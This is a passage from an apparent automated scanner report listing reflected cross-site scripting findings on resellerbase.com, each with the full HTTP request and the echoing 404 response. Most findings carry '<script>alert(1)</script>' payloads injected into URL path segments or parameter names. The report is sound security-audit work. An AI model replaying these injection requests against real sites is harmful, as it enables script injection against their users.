<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/search.php?keyword=search...&Submit3=Search&opt=2&990bf<script>alert(1)</script>c53230b72bd=1 was not found on this server.</p>
...[SNIP]...

2.3660. http://www.resellerbase.com/detail/8/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload abb9e<a>08a438e34a0 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/search.php?keyword=search...&Submit3=Search&opt=2abb9e<a>08a438e34a0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/search.php?keyword=search...&Submit3=Search&opt=2abb9e<a>08a438e34a0 was not found on this server.</p>
...[SNIP]...

2.3661. http://www.resellerbase.com/detail/8/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d4ee4<script>alert(1)</script>131beb39f28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild4ee4<script>alert(1)</script>131beb39f28/8/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild4ee4<script>alert(1)</script>131beb39f28/8/themes/ was not found on this server.</p>
...[SNIP]...

2.3662. http://www.resellerbase.com/detail/8/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70030<script>alert(1)</script>aacf8b4949f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/870030<script>alert(1)</script>aacf8b4949f/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/870030<script>alert(1)</script>aacf8b4949f/themes/ was not found on this server.</p>
...[SNIP]...

2.3663. http://www.resellerbase.com/detail/8/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52271<script>alert(1)</script>d23e1c1c7ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes52271<script>alert(1)</script>d23e1c1c7ca/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes52271<script>alert(1)</script>d23e1c1c7ca/ was not found on this server.</p>
...[SNIP]...

2.3664. http://www.resellerbase.com/detail/8/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload de1c9<script>alert(1)</script>a2e066ac0bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/?de1c9<script>alert(1)</script>a2e066ac0bd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/?de1c9<script>alert(1)</script>a2e066ac0bd=1 was not found on this server.</p>
...[SNIP]...

2.3665. http://www.resellerbase.com/detail/8/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4b9d6<script>alert(1)</script>c45a55d0e2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4b9d6<script>alert(1)</script>c45a55d0e2f/8/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4b9d6<script>alert(1)</script>c45a55d0e2f/8/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3666. http://www.resellerbase.com/detail/8/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b59d<script>alert(1)</script>fbde98993f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/87b59d<script>alert(1)</script>fbde98993f6/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/87b59d<script>alert(1)</script>fbde98993f6/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3667. http://www.resellerbase.com/detail/8/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5bda7<script>alert(1)</script>b3251cbd557 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes5bda7<script>alert(1)</script>b3251cbd557/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes5bda7<script>alert(1)</script>b3251cbd557/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3668. http://www.resellerbase.com/detail/8/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94f05<script>alert(1)</script>237d75f48d7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos94f05<script>alert(1)</script>237d75f48d7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos94f05<script>alert(1)</script>237d75f48d7/ was not found on this server.</p>
...[SNIP]...

2.3669. http://www.resellerbase.com/detail/8/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 77007<script>alert(1)</script>024f40fc4c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/?77007<script>alert(1)</script>024f40fc4c3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/?77007<script>alert(1)</script>024f40fc4c3=1 was not found on this server.</p>
...[SNIP]...

2.3670. http://www.resellerbase.com/detail/8/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 26757<script>alert(1)</script>11bda499fcf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail26757<script>alert(1)</script>11bda499fcf/8/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail26757<script>alert(1)</script>11bda499fcf/8/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3671. http://www.resellerbase.com/detail/8/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38ae2<script>alert(1)</script>acab130366a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/838ae2<script>alert(1)</script>acab130366a/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/838ae2<script>alert(1)</script>acab130366a/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3672. http://www.resellerbase.com/detail/8/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee817<script>alert(1)</script>ca91116781b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themesee817<script>alert(1)</script>ca91116781b/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themesee817<script>alert(1)</script>ca91116781b/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3673. http://www.resellerbase.com/detail/8/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45ade<script>alert(1)</script>c1adf92647f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos45ade<script>alert(1)</script>c1adf92647f/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos45ade<script>alert(1)</script>c1adf92647f/images/ was not found on this server.</p>
...[SNIP]...

2.3674. http://www.resellerbase.com/detail/8/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9b24c<script>alert(1)</script>422ed50f0bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images9b24c<script>alert(1)</script>422ed50f0bc/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images9b24c<script>alert(1)</script>422ed50f0bc/ was not found on this server.</p>
...[SNIP]...

2.3675. http://www.resellerbase.com/detail/8/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3d273<script>alert(1)</script>b17a917daa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/?3d273<script>alert(1)</script>b17a917daa1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/?3d273<script>alert(1)</script>b17a917daa1=1 was not found on this server.</p>
...[SNIP]...

2.3676. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2200e<script>alert(1)</script>8c1de43327f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2200e<script>alert(1)</script>8c1de43327f/8/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2200e<script>alert(1)</script>8c1de43327f/8/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3677. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be435<script>alert(1)</script>34720c55fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8be435<script>alert(1)</script>34720c55fd/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8be435<script>alert(1)</script>34720c55fd/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3678. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9e04a<script>alert(1)</script>82e00c912e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes9e04a<script>alert(1)</script>82e00c912e4/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes9e04a<script>alert(1)</script>82e00c912e4/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3679. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36a17<script>alert(1)</script>4ea1be5d94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos36a17<script>alert(1)</script>4ea1be5d94/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
